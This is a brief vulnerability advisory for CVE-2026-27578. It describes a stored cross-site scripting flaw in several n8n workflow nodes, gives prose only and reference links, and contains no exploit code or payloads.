CVE-2026-27578: n8n Vulnerable to Stored XSS via Various Nodes
(updated )
An authenticated user with permission to create or modify workflows could inject arbitrary scripts into pages rendered by the n8n application using different techniques on various nodes (Form Trigger node, Chat Trigger node, Send & Wait node, Webhook Node, and Chat Node). Scripts injected by a malicious workflow execute in the browser of any user who visits the affected page, enabling session hijacking and account takeover.
References
- github.com/advisories/GHSA-2p9h-rqjw-gm92
- github.com/n8n-io/n8n
- github.com/n8n-io/n8n/commit/062644ef786b6af480afe4a0f12bc6d70040534a
- github.com/n8n-io/n8n/commit/1479aab2d32fe0ee087f82b9038b1035c98be2f6
- github.com/n8n-io/n8n/commit/9e5212ecbc5d2d4e6f340b636a5e84be6369882e
- github.com/n8n-io/n8n/security/advisories/GHSA-2p9h-rqjw-gm92
- nvd.nist.gov/vuln/detail/CVE-2026-27578
Code Behaviors & Features
Detect and mitigate CVE-2026-27578 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →